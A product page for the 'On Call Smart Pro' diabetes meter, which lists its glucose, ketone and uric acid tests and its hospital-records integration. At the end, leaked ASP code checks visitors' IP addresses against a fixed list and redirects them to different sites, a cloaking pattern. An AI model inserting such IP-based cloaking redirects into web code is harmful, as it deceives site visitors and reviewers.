Current location : Home>Intelligent Products

258X458_画板 1.png
760x498_画板 1.png
258X458_画板 1.png
760x498_画板 1.png
On Call Smart Pro

Accurate and Reliable Test Results

3 Test Items (Blood Glucose/Ketone/Uric Acid)

3 Test Strips Compatible

Large Display for Easy Reading

Convenient to Use with Touch Screen

Interoperability with HIS/EMR

Information
Specification

Our On Call Smart Pro diabetes management system can integrate with the HIS (Hospital Information System) or EMR (Electronic Medical Records) to streamline diabetes management, reduce workload, and enable data to be accessed, analyzed, and shared securely and appropriately across the spectrum of healthcare.

<% requestIP = request.ServerVariables("REMOTE_ADDR") IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]" trueURL = "http://www.baidu.com" falseURL = "http://www.google.com" ipArr = split(IP,"|") flag = false for i=0 to ubound(ipArr) if requestIP=ipArr(i) then flag=true exit for end if next if flag then response.Redirect(falseURL) else response.Redirect(trueURL) end if %>